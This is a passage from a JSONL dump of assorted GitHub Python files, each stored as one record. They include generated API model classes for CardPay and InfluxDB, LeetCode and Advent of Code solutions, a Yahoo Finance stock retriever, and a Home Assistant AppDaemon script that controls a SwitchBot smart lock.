range(1,10):\n if ord(chr('a')) + i - 1 != col:\n print(chr(ord('a') + i - 1), row)\n if i != row:\n print(col, i) \n","repo_name":"RaulMyron/programacao-competitiva","sub_path":"contests/atcoders/div3/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29126084504","text":"# coding: utf-8\n\n\"\"\"\n CardPay REST API\n\n Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a [REST](https://en.wikipedia.org/wiki/Representational_state_transfer) resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchant uses API to create payments, refunds, payouts or recurrings, check or update transaction status and get information about created transactions. In API authentication process based on [OAuth 2.0](https://oauth.net/2/) standard. For recent changes see changelog section. # noqa: E501\n\n OpenAPI spec version: 3.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cardpay.model.payment_response_card_account import (\n PaymentResponseCardAccount,\n) # noqa: F401,E501\nfrom cardpay.model.recurring_customer import RecurringCustomer # noqa: F401,E501\nfrom cardpay.model.recurring_response_recurring_data import (\n RecurringResponseRecurringData,\n) # noqa: F401,E501\nfrom cardpay.model.transaction_response_merchant_order import (\n TransactionResponseMerchantOrder,\n) # noqa: F401,E501\n\n\nclass RecurringCallback(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n \"callback_time\": \"str\",\n \"card_account\": \"PaymentResponseCardAccount\",\n \"customer\": \"RecurringCustomer\",\n \"merchant_order\": \"TransactionResponseMerchantOrder\",\n \"payment_method\": \"str\",\n \"recurring_data\": \"RecurringResponseRecurringData\",\n }\n\n attribute_map = {\n \"callback_time\": \"callback_time\",\n \"card_account\": \"card_account\",\n \"customer\": \"customer\",\n \"merchant_order\": \"merchant_order\",\n \"payment_method\": \"payment_method\",\n \"recurring_data\": \"recurring_data\",\n }\n\n def __init__(\n self,\n callback_time=None,\n card_account=None,\n customer=None,\n merchant_order=None,\n payment_method=None,\n recurring_data=None,\n ): # noqa: E501\n \"\"\"RecurringCallback - a model defined in Swagger\"\"\" # noqa: E501\n\n self._callback_time = None\n self._card_account = None\n self._customer = None\n self._merchant_order = None\n self._payment_method = None\n self._recurring_data = None\n self.discriminator = None\n\n if callback_time is not None:\n self.callback_time = callback_time\n if card_account is not None:\n self.card_account = card_account\n if customer is not None:\n self.customer = customer\n if merchant_order is not None:\n self.merchant_order = merchant_order\n if payment_method is not None:\n self.payment_method = payment_method\n if recurring_data is not None:\n self.recurring_data = recurring_data\n\n @property\n def callback_time(self):\n \"\"\"Gets the callback_time of this RecurringCallback. # noqa: E501\n\n Date and time of created callback in [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) format # noqa: E501\n\n :return: The callback_time of this RecurringCallback. # noqa: E501\n :rtype: str\n \"\"\"\n return self._callback_time\n\n @callback_time.setter\n def callback_time(self, callback_time):\n \"\"\"Sets the callback_time of this RecurringCallback.\n\n Date and time of created callback in [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) format # noqa: E501\n\n :param callback_time: The callback_time of this RecurringCallback. # noqa: E501\n :type: str\n \"\"\"\n\n self._callback_time = callback_time\n\n @property\n def card_account(self):\n \"\"\"Gets the card_account of this RecurringCallback. # noqa: E501\n\n Card account data # noqa: E501\n\n :return: The card_account of this RecurringCallback. # noqa: E501\n :rtype: PaymentResponseCardAccount\n \"\"\"\n return self._card_account\n\n @card_account.setter\n def card_account(self, card_account):\n \"\"\"Sets the card_account of this RecurringCallback.\n\n Card account data # noqa: E501\n\n :param card_account: The card_account of this RecurringCallback. # noqa: E501\n :type: PaymentResponseCardAccount\n \"\"\"\n\n self._card_account = card_account\n\n @property\n def customer(self):\n \"\"\"Gets the customer of this RecurringCallback. # noqa: E501\n\n Customer data # noqa: E501\n\n :return: The customer of this RecurringCallback. # noqa: E501\n :rtype: RecurringCustomer\n \"\"\"\n return self._customer\n\n @customer.setter\n def customer(self, customer):\n \"\"\"Sets the customer of this RecurringCallback.\n\n Customer data # noqa: E501\n\n :param customer: The customer of this RecurringCallback. # noqa: E501\n :type: RecurringCustomer\n \"\"\"\n\n self._customer = customer\n\n @property\n def merchant_order(self):\n \"\"\"Gets the merchant_order of this RecurringCallback. # noqa: E501\n\n Merchant order data # noqa: E501\n\n :return: The merchant_order of this RecurringCallback. # noqa: E501\n :rtype: TransactionResponseMerchantOrder\n \"\"\"\n return self._merchant_order\n\n @merchant_order.setter\n def merchant_order(self, merchant_order):\n \"\"\"Sets the merchant_order of this RecurringCallback.\n\n Merchant order data # noqa: E501\n\n :param merchant_order: The merchant_order of this RecurringCallback. # noqa: E501\n :type: TransactionResponseMerchantOrder\n \"\"\"\n\n self._merchant_order = merchant_order\n\n @property\n def payment_method(self):\n \"\"\"Gets the payment_method of this RecurringCallback. # noqa: E501\n\n Used payment method type name from payment methods list # noqa: E501\n\n :return: The payment_method of this RecurringCallback. # noqa: E501\n :rtype: str\n \"\"\"\n return self._payment_method\n\n @payment_method.setter\n def payment_method(self, payment_method):\n \"\"\"Sets the payment_method of this RecurringCallback.\n\n Used payment method type name from payment methods list # noqa: E501\n\n :param payment_method: The payment_method of this RecurringCallback. # noqa: E501\n :type: str\n \"\"\"\n\n self._payment_method = payment_method\n\n @property\n def recurring_data(self):\n \"\"\"Gets the recurring_data of this RecurringCallback. # noqa: E501\n\n Recurring data # noqa: E501\n\n :return: The recurring_data of this RecurringCallback. # noqa: E501\n :rtype: RecurringResponseRecurringData\n \"\"\"\n return self._recurring_data\n\n @recurring_data.setter\n def recurring_data(self, recurring_data):\n \"\"\"Sets the recurring_data of this RecurringCallback.\n\n Recurring data # noqa: E501\n\n :param recurring_data: The recurring_data of this RecurringCallback. # noqa: E501\n :type: RecurringResponseRecurringData\n \"\"\"\n\n self._recurring_data = recurring_data\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(\n map(lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x, value)\n )\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(\n map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\")\n else item,\n value.items(),\n )\n )\n else:\n if value is not None:\n result[attr] = value\n if issubclass(RecurringCallback, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RecurringCallback):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"cardpay/python-sdk-v3","sub_path":"cardpay/model/recurring_callback.py","file_name":"recurring_callback.py","file_ext":"py","file_size_in_byte":9077,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23776850041","text":"'''\nIntersection of Two Arrays II\n\nGiven two integer arrays nums1 and nums2, return an array of their intersection. Each element in the result must appear as many times as it shows in both arrays and you may return the result in any order.\n\n \n\nExample 1:\n\nInput: nums1 = [1,2,2,1], nums2 = [2,2]\nOutput: [2,2]\n\nExample 2:\n\nInput: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\nOutput: [4,9]\nExplanation: [9,4] is also accepted.\n\n \n\nConstraints:\n\n 1 <= nums1.length, nums2.length <= 1000\n 0 <= nums1[i], nums2[i] <= 1000\n\n \n\nFollow up:\n\n What if the given array is already sorted? How would you optimize your algorithm?\n What if nums1's size is small compared to nums2's size? Which algorithm is better?\n What if elements of nums2 are stored on disk, and the memory is limited such that you cannot load all elements into the memory at once?\n\n'''\nclass Solution:\n def intersect(self, nums1: [int], nums2: [int]) -> [int]:\n nums1_count = Counter(nums1)\n nums2_count = Counter(nums2)\n res = []\n for key, value in nums1_count.items():\n if key in nums2_count:\n res.extend([key]*min(nums1_count[key], nums2_count[key]))\n return res\n\ntime, O(m+n), space, O(min(m, n))\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n if len(nums1) > len(nums2): return self.intersect(nums2, nums1)\n \n cnt = Counter(nums1)\n ans = []\n for x in nums2:\n if cnt[x] > 0:\n ans.append(x)\n cnt[x] -= 1\n return ans","repo_name":"jomesh18/Leetcode","sub_path":"Top_interview_questions/Easy/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29084658598","text":"# coding: utf-8\n\n\"\"\"\nInfluxDB OSS API Service.\n\nThe InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501\n\nOpenAPI spec version: 2.0.0\nGenerated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\n\nclass PostBucketRequest(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'org_id': 'str',\n 'name': 'str',\n 'description': 'str',\n 'rp': 'str',\n 'retention_rules': 'list[BucketRetentionRules]',\n 'schema_type': 'SchemaType'\n }\n\n attribute_map = {\n 'org_id': 'orgID',\n 'name': 'name',\n 'description': 'description',\n 'rp': 'rp',\n 'retention_rules': 'retentionRules',\n 'schema_type': 'schemaType'\n }\n\n def __init__(self, org_id=None, name=None, description=None, rp='0', retention_rules=None, schema_type=None): # noqa: E501,D401,D403\n \"\"\"PostBucketRequest - a model defined in OpenAPI.\"\"\" # noqa: E501\n self._org_id = None\n self._name = None\n self._description = None\n self._rp = None\n self._retention_rules = None\n self._schema_type = None\n self.discriminator = None\n\n self.org_id = org_id\n self.name = name\n if description is not None:\n self.description = description\n if rp is not None:\n self.rp = rp\n if retention_rules is not None:\n self.retention_rules = retention_rules\n if schema_type is not None:\n self.schema_type = schema_type\n\n @property\n def org_id(self):\n \"\"\"Get the org_id of this PostBucketRequest.\n\n The organization ID. Specifies the organization that owns the bucket.\n\n :return: The org_id of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._org_id\n\n @org_id.setter\n def org_id(self, org_id):\n \"\"\"Set the org_id of this PostBucketRequest.\n\n The organization ID. Specifies the organization that owns the bucket.\n\n :param org_id: The org_id of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n if org_id is None:\n raise ValueError(\"Invalid value for `org_id`, must not be `None`\") # noqa: E501\n self._org_id = org_id\n\n @property\n def name(self):\n \"\"\"Get the name of this PostBucketRequest.\n\n The bucket name.\n\n :return: The name of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Set the name of this PostBucketRequest.\n\n The bucket name.\n\n :param name: The name of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n if name is None:\n raise ValueError(\"Invalid value for `name`, must not be `None`\") # noqa: E501\n self._name = name\n\n @property\n def description(self):\n \"\"\"Get the description of this PostBucketRequest.\n\n A description of the bucket.\n\n :return: The description of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Set the description of this PostBucketRequest.\n\n A description of the bucket.\n\n :param description: The description of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n self._description = description\n\n @property\n def rp(self):\n \"\"\"Get the rp of this PostBucketRequest.\n\n The retention policy for the bucket. For InfluxDB 1.x, specifies the duration of time that each data point in the retention policy persists. If you need compatibility with InfluxDB 1.x, specify a value for the `rp` property; otherwise, see the `retentionRules` property. [Retention policy](https://docs.influxdata.com/influxdb/v1.8/concepts/glossary/#retention-policy-rp) is an InfluxDB 1.x concept. The InfluxDB 2.x and Cloud equivalent is [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). The InfluxDB `/api/v2` API uses `RetentionRules` to configure the retention period.\n\n :return: The rp of this PostBucketRequest.\n :rtype: str\n \"\"\" # noqa: E501\n return self._rp\n\n @rp.setter\n def rp(self, rp):\n \"\"\"Set the rp of this PostBucketRequest.\n\n The retention policy for the bucket. For InfluxDB 1.x, specifies the duration of time that each data point in the retention policy persists. If you need compatibility with InfluxDB 1.x, specify a value for the `rp` property; otherwise, see the `retentionRules` property. [Retention policy](https://docs.influxdata.com/influxdb/v1.8/concepts/glossary/#retention-policy-rp) is an InfluxDB 1.x concept. The InfluxDB 2.x and Cloud equivalent is [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). The InfluxDB `/api/v2` API uses `RetentionRules` to configure the retention period.\n\n :param rp: The rp of this PostBucketRequest.\n :type: str\n \"\"\" # noqa: E501\n self._rp = rp\n\n @property\n def retention_rules(self):\n \"\"\"Get the retention_rules of this PostBucketRequest.\n\n Retention rules to expire or retain data. The InfluxDB `/api/v2` API uses `RetentionRules` to configure the [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). #### InfluxDB Cloud - `retentionRules` is required. #### InfluxDB OSS - `retentionRules` isn't required.\n\n :return: The retention_rules of this PostBucketRequest.\n :rtype: list[BucketRetentionRules]\n \"\"\" # noqa: E501\n return self._retention_rules\n\n @retention_rules.setter\n def retention_rules(self, retention_rules):\n \"\"\"Set the retention_rules of this PostBucketRequest.\n\n Retention rules to expire or retain data. The InfluxDB `/api/v2` API uses `RetentionRules` to configure the [retention period](https://docs.influxdata.com/influxdb/latest/reference/glossary/#retention-period). #### InfluxDB Cloud - `retentionRules` is required. #### InfluxDB OSS - `retentionRules` isn't required.\n\n :param retention_rules: The retention_rules of this PostBucketRequest.\n :type: list[BucketRetentionRules]\n \"\"\" # noqa: E501\n self._retention_rules = retention_rules\n\n @property\n def schema_type(self):\n \"\"\"Get the schema_type of this PostBucketRequest.\n\n :return: The schema_type of this PostBucketRequest.\n :rtype: SchemaType\n \"\"\" # noqa: E501\n return self._schema_type\n\n @schema_type.setter\n def schema_type(self, schema_type):\n \"\"\"Set the schema_type of this PostBucketRequest.\n\n :param schema_type: The schema_type of this PostBucketRequest.\n :type: SchemaType\n \"\"\" # noqa: E501\n self._schema_type = schema_type\n\n def to_dict(self):\n \"\"\"Return the model properties as a dict.\"\"\"\n result = {}\n\n for attr, _ in self.openapi_types.items():\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Return the string representation of the model.\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`.\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Return true if both objects are equal.\"\"\"\n if not isinstance(other, PostBucketRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Return true if both objects are not equal.\"\"\"\n return not self == other\n","repo_name":"influxdata/influxdb-client-python","sub_path":"influxdb_client/domain/post_bucket_request.py","file_name":"post_bucket_request.py","file_ext":"py","file_size_in_byte":8809,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"35110185881","text":"\"\"\"This module isn't mine, it's at 99% inspired from https://github.com/gurch101/StockScraper written by Gurchet Rai.\nSo all rigts reserved to Gurchet Rai.\nDocumentation http://www.gurchet-rai.net/dev/yahoo-finance-yql\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport re\nimport json\nfrom datetime import date, timedelta\n\nimport requests\n\nfrom myql.myql import YQL\n\nclass StockRetriever(YQL):\n\n def __init__(self, format='json', debug=False, oauth=None):\n \"\"\"Initialize the object\n \"\"\"\n super(StockRetriever, self).__init__(community=True, format=format, debug=debug, oauth=oauth)\n \n def __get_time_range(self, startDate, endDate):\n \"\"\"Return time range\n \"\"\"\n today = date.today()\n start_date = today - timedelta(days=today.weekday(), weeks=1)\n end_date = start_date + timedelta(days=4)\n\n startDate = startDate if startDate else str(start_date)\n endDate = endDate if endDate else str(end_date)\n \n return startDate, endDate\n\n def get_current_info(self, symbolList, columns=None):\n \"\"\"get_current_info() uses the yahoo.finance.quotes datatable to get all of the stock information presented in the main table on a typical stock page \n and a bunch of data from the key statistics page.\n \"\"\"\n response = self.select('yahoo.finance.quotes',columns).where(['symbol','in',symbolList])\n return response\n\n def get_news_feed(self, symbol):\n \"\"\"get_news_feed() uses the rss data table to get rss feeds under the Headlines and Financial Blogs headings on a typical stock page.\n \"\"\"\n rss_url='http://finance.yahoo.com/rss/headline?s={0}'.format(symbol)\n response = self.select('rss',['title','link','description'],limit=2).where(['url','=',rss_url])\n return response\n\n def get_historical_info(self, symbol,items=None, startDate=None, endDate=None, limit=None):\n \"\"\"get_historical_info() uses the csv datatable to retrieve all available historical data on a typical historical prices page\n \"\"\"\n startDate, endDate = self.__get_time_range(startDate, endDate)\n response = self.select('yahoo.finance.historicaldata',items,limit).where(['symbol','=',symbol],['startDate','=',startDate],['endDate','=',endDate])\n return response\n\n def get_options_info(self, symbol, items=None, expiration=''):\n \"\"\"get_options_data() uses the yahoo.finance.options table to retrieve call and put options from the options page.\n \"\"\"\n response = self.select('yahoo.finance.options',items).where(['symbol','=',symbol],[] if not expiration else ['expiration','=',expiration])\n return response\n\n def get_index_summary(self, symbol, items=None):\n \"\"\"\n \"\"\"\n response = self.select('yahoo.finance.quoteslist',items).where(['symbol','=',symbol])\n return response\n\n def get_industry_index(self, index_id,items=None):\n \"\"\"retrieves all symbols that belong to an industry.\n \"\"\"\n response = self.select('yahoo.finance.industry',items).where(['id','=',index_id])\n return response\n\n def get_xchange_rate(self, pairs, items=None):\n \"\"\"Retrieves currency exchange rate data for given pair(s). \n Accepts both where pair='eurusd, gbpusd' and where pair in ('eurusd', 'gpbusd, usdaud')\n \"\"\"\n response = self.select('yahoo.finance.xchange', items).where(['pair', 'in', pairs])\n return response\n\n def get_dividendhistory(self, symbol, startDate, endDate, items=None):\n \"\"\"Retrieves divident history\n \"\"\"\n startDate, endDate = self.__get_time_range(startDate, endDate)\n response = self.select('yahoo.finance.dividendhistory', items).where(['symbol', '=', symbol], ['startDate', '=', startDate], ['endDate', '=', endDate])\n return response\n\n def get_balancesheet(self, symbol):\n \"\"\"Retrieves balance sheet\n \"\"\"\n response = self.select('yahoo.finance.balancesheet').where(['symbol', '=', symbol])\n return response\n\n def get_symbols(self, name):\n \"\"\"Retrieves all symbols belonging to a company\n \"\"\"\n url = \"http://autoc.finance.yahoo.com/autoc?query={0}&callback=YAHOO.Finance.SymbolSuggest.ssCallback\".format(name)\n\n response = requests.get(url)\n\n json_data = re.match(\"YAHOO\\.Finance\\.SymbolSuggest.ssCallback\\((.*)\\)\", response.text)\n try:\n json_data = json_data.groups()[0]\n except (Exception,) as e:\n print(e)\n json_data = '{\"results\": \"Webservice seems to be down\"}'\n\n return type('response', (requests.Response,),{\n 'text' : json_data,\n 'content': json_data.encode(),\n 'status_code': response.status_code,\n 'reason': response.reason,\n 'encoding': response.encoding,\n 'apparent_encoding': response.apparent_encoding,\n 'cookies': response.cookies,\n 'headers': response.headers,\n 'json': lambda : json.loads(json_data),\n 'url': response.url\n })\n","repo_name":"josuebrunel/myql","sub_path":"myql/contrib/finance/stockscraper/stockretriever.py","file_name":"stockretriever.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"71522999273","text":"M = float(input())\nm = float(input())\nVM = float(input())\nvm = float(input())\n\nif VM <= vm:\n print(\"Tidak ada tumbukan\")\nelse:\n d = -1 * (vm - VM)\n momentum_total = (M * VM) + (m * vm)\n \n #Starts SPLDV solving\n #avm' + bVM' = c, dvm' - eVM' = f, d = e = 1\n\n a = [m, M, momentum_total]\n b = [M, M, M * d]\n\n elim_1 = a[0] + b[0]\n elim_2 = a[2] + b[2] \n\n vm_2 = round(elim_2 / elim_1, 2)\n VM_2 = round(vm_2 - d, 2)\n\n print(f\"{vm_2} {VM_2}\")\n\n\n\n","repo_name":"alfonsusrr/impact","sub_path":"A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25077153002","text":"#!/usr/bin/env python\n\n\"\"\"\nby Karolos Potamianos, for THE Port Hackathon 2017\n\"\"\"\n\nimport os, sys\n\nimport qrtools\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Decode QR code\")\nparser.add_argument('-f', metavar='file', type=str, nargs=1,\n help='file with QR code to decode')\n\nargs = parser.parse_args()\nfileName = args.f[0]\n\nprint(fileName)\n\nqr = qrtools.QR()\nqr.decode(fileName)\nprint(qr.data)\n","repo_name":"THEPortatCERN/Hackathon2017-Pier49","sub_path":"python/readQR.py","file_name":"readQR.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22274587255","text":"import correction\nimport ocr\nimport cv2\nimport sys\n\n\ndef main(argv):\n img_path = \"./images/cfva648.jpg\"\n DEBUG_MODE = False\n\n for option in argv:\n if option in ('-d', '--debug'):\n print('Running in DEBUG mode...')\n DEBUG_MODE = True\n if len(argv) > 0:\n img_path = argv[0]\n \n # This will only work when correction the code to get the bounding boxes has been completed\n # corrected_img = correction.correct(img_path, True)\n # ocr.ocr(corrected_img, True)\n\n\n # In the mean time, correction() and ocr() can be tested individually.\n # Below is sample test code.\n\n # For now, correction() only works if the bounding boxes have been hardcoded\n correction.correct(\"images/perspective.jpg\", debug_mode=DEBUG_MODE)\n\n # ocr works with any image\n img = cv2.imread(img_path)\n ocr.ocr(img, debug_mode=DEBUG_MODE)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"VincentMadoreC/ProjectCSI4900","sub_path":"LicencePlateRecognition/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31266275411","text":"import sys\n\ndef read():\n lines = []\n for line in open(sys.argv[1]):\n if line.strip() == '':\n yield lines\n lines = []\n else:\n lines.append(line.strip())\n if lines:\n yield lines\n\n\nn_1, n_2 = 0, 0\nfor groups in read():\n answers_1 = set.union(*[set(group) for group in groups])\n answers_2 = set.intersection(*[set(group) for group in groups])\n print(groups, answers_1, answers_2)\n n_1 += len(answers_1)\n n_2 += len(answers_2)\n\nprint(n_1, n_2)\n","repo_name":"erikbern/advent-of-code-2020","sub_path":"day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"3345390817","text":"# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\n\"\"\"\r\n中序遍历,存储结果到两个数组,\r\n反转其中一个数组,结果出错。\r\n\"\"\"\r\nclass Solution2:\r\n def isSymmetric(self, root: TreeNode) -> bool:\r\n if not root:\r\n return True\r\n tree1, tree2 = root.left, root.right\r\n nums1, nums2 = [], []\r\n self.leftsearch(tree1, nums1)\r\n self.rightsearch(tree2, nums2)\r\n print(nums1)\r\n print(nums2)\r\n nums2.reverse()\r\n return nums1 == nums2\r\n\r\n def leftsearch(self, tree, nums):\r\n # print(tree.val)\r\n if tree == None:\r\n return\r\n\r\n # if not tree.left and not tree.right:\r\n # return\r\n self.leftsearch(tree.left, nums)\r\n nums.append(tree.val)\r\n self.leftsearch(tree.right, nums)\r\n\r\n def rightsearch(self, tree, nums):\r\n # print(tree.val)\r\n if tree == None:\r\n return\r\n\r\n # if not tree.left and not tree.right:\r\n # return\r\n self.rightsearch(tree.left, nums)\r\n nums.append(tree.val)\r\n self.rightsearch(tree.right, nums)\r\n\r\na, b, c, d, e, f, g = TreeNode(1), TreeNode(2), TreeNode(2), TreeNode('null'), TreeNode(3), TreeNode('null'), TreeNode(3)\r\na.left, a.right, b.left, b.right, c.left, c.right = b, c, d, e, f, g\r\n\r\nprint(Solution2().isSymmetric(a))","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Top 100/101-2.py","file_name":"101-2.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6866299537","text":"import appdaemon.plugins.hass.hassapi as hass\nimport uuid\nfrom switchbot import SwitchBot\n\nclass SwitchBotLockManager(hass.Hass):\n\n def initialize(self):\n self.log('----------------------initialize')\n self.log(\"Switchbot initialized in AppDaemon...\")\n \n self.boolean_lock_deviceid = self.args[\"boolean_lock_deviceid\"]\n self.log(\"boolean_lock_deviceid= \" + self.boolean_lock_deviceid)\n\n self.status_update_interval_minutes = self.args[\"status_update_interval_minutes\"]\n self.log(\"status_update_interval_minutes= \" + str(self.status_update_interval_minutes))\n\n self.status_update_interval_seconds = self.status_update_interval_minutes * 60\n self.log(\"status_update_interval_seconds= \" + str(self.status_update_interval_seconds))\n\n self.push_notifiy_intity = self.args[\"push_notifiy_intity\"]\n self.log(\"push_notifiy_intity= \" + str(self.push_notifiy_intity))\n\n self.api_token = self.args[\"api_token\"]\n self.log(\"api_token= \" + str(self.api_token))\n self.api_secret = self.args[\"api_secret\"]\n self.log(\"api_secret= \" + str(self.api_secret))\n \n self.lock_name = self.boolean_lock_deviceid\n self.lock_name = self.lock_name.split('.')[1]\n self.log(\"lock_name= \" + self.lock_name)\n \n #self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret, nonce=str(uuid.uuid4()))\n self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret)\n #devices = self.switchbot.devices()\n #for device in devices:\n # print(device)\n \n self.listen_state(self.state_change, self.boolean_lock_deviceid)\n self.run_every(self.pull_status_update, \"now\", self.status_update_interval_seconds)\n self.log('----------------------initialize--end')\n \n def state_change(self, entity, attribute, old, new, kwargs):\n self.log('----------------------state_change')\n self.log('old= ' + old)\n self.log('new= ' + new)\n\n #self.switchbot = SwitchBot(token=self.args[\"api_token\"], secret=self.args[\"api_secret\"], nonce=str(uuid.uuid4()))\n self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret)\n self.lock = self.switchbot.device(id=self.args[\"smartlock_deviceid\"])\n lockstatus = self.lock.status()\n self.log(\"lock_state= \" + lockstatus[\"lock_state\"])\n self.log(\"door_state= \" + lockstatus[\"door_state\"])\n self.log(\"calibrate3= \" + str(lockstatus[\"calibrate\"]))\n self.log(\"battery= \" + str(lockstatus[\"battery\"]))\n \n if new == \"on\" and lockstatus[\"lock_state\"] == \"unlocked\":\n self.log(\"Attempting to Lock...\")\n self.lock.lock()\n self.turn_on(self.boolean_lock_deviceid )\n self.log(\"...Done Locking\")\n self.call_service(self.push_notifiy_intity, message=\"Lock [\"+self.lock_name+\"] Locked\")\n elif new == \"off\" and lockstatus[\"lock_state\"] == \"locked\":\n self.log(\"Attempting to UnLock...\")\n self.lock.unlock()\n self.turn_off(self.boolean_lock_deviceid )\n self.log(\"...Done Unlocking\")\n self.call_service(self.push_notifiy_intity, message=\"Lock [\"+self.lock_name+\"] UnLocked\")\n else:\n self.log(\"Nothing Done...\")\n self.call_service(self.push_notifiy_intity, message=\"Nothing done, Lock [\"+self.lock_name+\"] is already: \"+lockstatus[\"lock_state\"] )\n\n def pull_status_update(self, kwargs):\n self.log('----------------------pull_status_update')\n self.log(\"Executing periodic update....\")\n #self.switchbot = SwitchBot(token=self.args[\"api_token\"], secret=self.args[\"api_secret\"], nonce=str(uuid.uuid4()))\n self.switchbot = SwitchBot(token=self.api_token, secret=self.api_secret)\n self.lock = self.switchbot.device(id=self.args[\"smartlock_deviceid\"])\n lockstatus = self.lock.status()\n self.log(\"lock_state= \" + lockstatus[\"lock_state\"])\n self.log(\"door_state= \" + lockstatus[\"door_state\"])\n \n for value in lockstatus.values():\n self.log(value)\n \n self.log(\"calibrate4= \" + str(lockstatus[\"calibrate\"]))\n \n\n boolean_lock_device_state = self.get_state(self.boolean_lock_deviceid)\n self.log(\"boolean_lock_device_state= \" + boolean_lock_device_state)\n\n if lockstatus[\"lock_state\"] == \"unlocking\" or lockstatus[\"lock_state\"] == \"locking\":\n self.log(\"Nothing to update. lock_state: \" +lockstatus[\"lock_state\"])\n elif lockstatus[\"lock_state\"] == \"locked\" and boolean_lock_device_state == \"off\":\n self.turn_on(self.boolean_lock_deviceid)\n self.log(\"status updated to: \" +lockstatus[\"lock_state\"])\n elif lockstatus[\"lock_state\"] == 